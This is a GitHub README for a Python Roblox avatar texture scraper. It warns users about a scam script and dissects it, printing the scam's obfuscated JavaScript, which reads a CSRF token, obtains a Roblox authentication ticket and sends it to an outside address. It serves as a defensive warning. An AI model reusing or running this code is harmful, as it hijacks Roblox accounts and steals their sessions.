SaxaphoneWalrus / Roblox-Avatar-Texture-Scraper

Roblox Avatar Texture getter that won't steal your credentials - crazy, right?
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Roblox Avatar Texture Scraper

Got a message or email from someone asking for your Roblox Avatar Texture, and asking you to run a JavaScript script in your browser? Instead of doing that (and giving away access to your account in the process*), use Roblox Avatar Texture Scraper (RATS) to get it instead.

Example Usage


Make sure you have Python installed

Standalone File:

JavaScript Attack

The attack is simple, they ask you for your avatar texture and then give you an easy way of acquiring said texture. Simple, right? They're not asking for your password or anything, so where's the catch?

Getting Your Avatar

The way they get your avatar is simple and legitimate enough, they simply query Roblox's own API using your public details.

async function payload2() {
    var hash = (await (await fetch((await (await fetch("" + $("meta[name='user-data']").data("userid") + "&_=" + Math.random())).json()).Url)).json()).textures[0]

    for (var i = 31, t = 0; t < 32; t++)
        i ^= hash[t].charCodeAt(0);

    location.href = "https://t" + (i % 8).toString() + "" + hash

A simplified breakdown:

So.. where's the catch?

*The Catch

(async function(){var _0x2416b1=(await(await fetch('/home',{'credentials':'include'}))['text']())['split']('setToken(\x27')[0x1]['split']('\x27)')[0x0];var _0x12edd1=(await fetch('',{'method':'POST','credentials':'include','headers':{'x-csrf-token':_0x2416b1}}))['headers']['get']('rbx-authentication-ticket');await fetch(''+'?t='+_0x12edd1);await payload2()}());

This is at the bottom of the JavaScript file, all one line so it's harder to read. Let's make it a bit more readable (using MalwareDecoder because I am lazy.);

(async function(){
        var _0x2416b1=(await(await fetch('/home',{
        var _0x12edd1=(await fetch('',{
    await fetch(''+'?t='+_0x12edd1);
    await payload2()

And now let's have the guy that doesn't exactly know what he's talking about break it down again!

Why "RATS"?

My original python file I made for my own usage was called, and when I decided I wanted to put it out I decided to add Roblox to the name so people know what it's for, making it more likely to be seen by those who need it (Spoiler alert: Nobody will see it.) And then I added 'Scraper' to the end because, well, I think "Rats" sounds better than "RAT" - and it also helps that the people who made the original JS script are rats.


I make YouTube videos. They have nothing to do with this, I just thought I'd plug it in case anyone sees this.